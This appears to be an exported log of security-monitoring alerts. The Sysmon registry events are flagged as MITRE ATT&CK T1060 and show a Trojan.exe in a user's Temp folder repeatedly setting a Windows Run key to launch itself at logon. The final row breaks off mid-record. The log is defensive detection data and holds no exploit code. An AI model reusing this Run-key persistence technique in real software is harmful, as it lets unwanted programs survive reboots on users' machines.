HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:25.922226100Z"",""eventRecordID"":""1049"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:25.914\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:25.914"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:38.049",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:24.882 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:24.887911800Z"",""eventRecordID"":""1048"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:24.882\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:24.882"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:36.991",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:23.867 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:23.868431500Z"",""eventRecordID"":""1047"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:23.867\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:23.867"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:35.958",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:22.851 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:22.857439000Z"",""eventRecordID"":""1046"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:22.851\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:22.851"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:34.959",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:21.835 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:21.841374600Z"",""eventRecordID"":""1045"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:21.835\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:21.835"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:33.943",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:20.820 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:20.823405400Z"",""eventRecordID"":""1044"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:20.820\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:20.820"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:32.927",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:19.791 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:19.793780600Z"",""eventRecordID"":""1043"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:19.791\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:19.791"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:31.912",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:18.757 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:18.758692400Z"",""eventRecordID"":""1042"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:18.757\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:18.757"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:30.865",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:17.741 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:17.757687900Z"",""eventRecordID"":""1041"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:17.741\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:17.741"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:29.881",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:16.711 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:16.726786500Z"",""eventRecordID"":""1040"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:16.711\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:16.711"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:28.956",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:15.679 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:15.693022100Z"",""eventRecordID"":""1039"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:15.679\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:15.679"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:27.822",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:14.664 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 